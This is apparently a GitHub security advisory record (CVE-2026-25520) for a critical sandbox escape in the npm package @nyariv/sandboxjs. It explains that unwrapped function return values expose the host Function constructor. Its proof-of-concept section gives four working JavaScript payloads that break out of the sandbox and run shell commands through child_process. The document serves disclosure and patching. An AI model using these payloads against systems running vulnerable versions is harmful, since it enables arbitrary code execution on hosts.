{"id":"GHSA-58jh-xv4v-pcx4","summary":"@nyariv/sandboxjs has a Sandbox Escape issue","details":"### Summary\n\nThe return values of functions aren't wrapped. `Object.values`/`Object.entries` can be used to get an Array containing the host's `Function` constructor, by using `Array.prototype.at` you can obtain the hosts `Function` constructor, which can be used to execute arbitrary code outside of the sandbox.\n\n### Details\n\nThe return values of functions aren't wrapped, chaining function calls allows bypassing most validation/sanitization. \n\n### PoC\n\n```js\nconst s = require('@nyariv/sandboxjs').default;\nconst sb = new s();\n\npayload = `\nconsole.log(\n  Object.values(this).at(0)(\n    \"return process.getBuiltinModule('child_process').execSync('ls -lah').toString()\",\n  )(),\n);\n`\n\nsb.compile(payload)().run();\n```\n\n```js\nconst s = require(\"@nyariv/sandboxjs\").default;\nconst sb = new s();\n\npayload = `\nconsole.log(\n  Object.entries(this)[0].at(1)(\n    \"return process.getBuiltinModule('child_process').execSync('ls -lah').toString()\",\n  )(),\n);\n`\n\nsb.compile(payload)().run();\n```\n\n```js\nconst s = require(\"@nyariv/sandboxjs\").default;\nconst sb = new s();\n\npayload = `\nconsole.log(\n  Object.entries(this)\n    .at(0)\n    .map((f) =\u003e {\n      if (typeof f === 'function') {\n        f.call('', 'return process')()\n          .getBuiltinModule('child_process')\n          .execSync('ls -lah', { stdio: 'inherit' });\n      }\n    }),\n);\n`\n\nsb.compile(payload)().run();\n```\n\n```js\nconst s = require(\"@nyariv/sandboxjs\").default;\nconst sb = new s();\n\npayload = `\nconst t = (f) =\u003e {\n  f.call('', 'return process')()\n    .getBuiltinModule('child_process')\n    .execSync('ls -lah', { stdio: 'inherit' });\n};\nconsole.log(t.call(...Object.entries(this)[0]));\n`\n\nsb.compile(payload)().run();\n```\n\n### Impact\n\nSanbox Escape -\u003e RCE","aliases":["CVE-2026-25520"],"modified":"2026-02-06T22:22:10.705894Z","published":"2026-02-05T20:41:28Z","database_specific":{"nvd_published_at":"2026-02-06T20:16:10Z","cwe_ids":["CWE-74"],"severity":"CRITICAL","github_reviewed":true,"github_reviewed_at":"2026-02-05T20:41:28Z"},"references":[{"type":"WEB","url":"https://github.com/nyariv/SandboxJS/security/advisories/GHSA-58jh-xv4v-pcx4"},{"type":"ADVISORY","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-25520"},{"type":"WEB","url":"https://github.com/nyariv/SandboxJS/commit/67cb186c41c78c51464f70405504e8ef0a6e43c3"},{"type":"PACKAGE","url":"https://github.com/nyariv/SandboxJS"}],"affected":[{"package":{"name":"@nyariv/sandboxjs","ecosystem":"npm","purl":"pkg:npm/%40nyariv/sandboxjs"},"ranges":[{"type":"SEMVER","events":[{"introduced":"0"},{"fixed":"0.8.29"}]}],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/02/GHSA-58jh-xv4v-pcx4/GHSA-58jh-xv4v-pcx4.json","last_known_affected_version_range":"\u003c= 0.8.28"}}],"schema_version":"1.9.0","severity":[{"type":"CVSS_V3","score":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"}]}